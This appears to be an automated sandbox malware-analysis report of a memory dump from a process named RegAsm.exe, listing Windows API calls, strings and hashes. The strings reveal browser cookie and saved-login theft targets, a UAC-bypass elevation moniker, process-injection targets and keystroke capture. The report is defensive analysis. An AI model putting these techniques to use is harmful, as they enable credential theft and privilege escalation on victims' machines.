                                                                • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                • String ID:
                                                                • API String ID: 297527592-0
                                                                • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                • API String ID: 3756808967-1743721670
                                                                • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0$1$2$3$4$5$6$7$VG
                                                                • API String ID: 0-1861860590
                                                                • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0040755C
                                                                • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Object_wcslen
                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                • API String ID: 240030777-3166923314
                                                                • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                APIs
                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                • GetLastError.KERNEL32 ref: 0041A84C
                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                • String ID:
                                                                • API String ID: 3587775597-0
                                                                • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                • String ID: JD$JD$JD
                                                                • API String ID: 745075371-3517165026
                                                                • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$CloseFile$FirstNext
                                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                • API String ID: 1164774033-405221262
                                                                • Opcode ID: fddf014dc9d51464ede12c116fb1a9a1db5591685b143fb650fb6654b978e18b
                                                                • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                • Opcode Fuzzy Hash: fddf014dc9d51464ede12c116fb1a9a1db5591685b143fb650fb6654b978e18b
                                                                • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                • String ID:
                                                                • API String ID: 2341273852-0
                                                                • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Find$CreateFirstNext
                                                                • String ID: 8SG$PXG$PXG$NG$PG
                                                                • API String ID: 341183262-3812160132
                                                                • Opcode ID: 6f7d9e176dbb922e5901518d2a500cbc9bfb5a1b0f14e37a1c7bedcfbb51ebec
                                                                • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                • Opcode Fuzzy Hash: 6f7d9e176dbb922e5901518d2a500cbc9bfb5a1b0f14e37a1c7bedcfbb51ebec
                                                                • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                • String ID:
                                                                • API String ID: 1888522110-0
                                                                • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                APIs
                                                                • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                                • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                • API String ID: 2127411465-314212984
                                                                • Opcode ID: feda3c0cb2e05dbf246105b527e356fbe40292db3182a56c896b5e0f635c8d19
                                                                • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                • Opcode Fuzzy Hash: feda3c0cb2e05dbf246105b527e356fbe40292db3182a56c896b5e0f635c8d19
                                                                • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                APIs
                                                                • _free.LIBCMT ref: 00449292
                                                                • _free.LIBCMT ref: 004492B6
                                                                • _free.LIBCMT ref: 0044943D
                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                • _free.LIBCMT ref: 00449609
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                • String ID:
                                                                • API String ID: 314583886-0
                                                                • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                APIs
                                                                  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                • API String ID: 1589313981-2876530381
                                                                • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                APIs
                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                • GetLastError.KERNEL32 ref: 0040BA93
                                                                Strings
                                                                • UserProfile, xrefs: 0040BA59
                                                                • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteErrorFileLast
                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                • API String ID: 2018770650-1062637481
                                                                • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                • GetLastError.KERNEL32 ref: 004179D8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                • String ID: SeShutdownPrivilege
                                                                • API String ID: 3534403312-3733053543
                                                                • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00409293
                                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00AC4830,00000010), ref: 004048E0
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                • String ID:
                                                                • API String ID: 1824512719-0
                                                                • Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                • Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                • String ID:
                                                                • API String ID: 276877138-0
                                                                • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
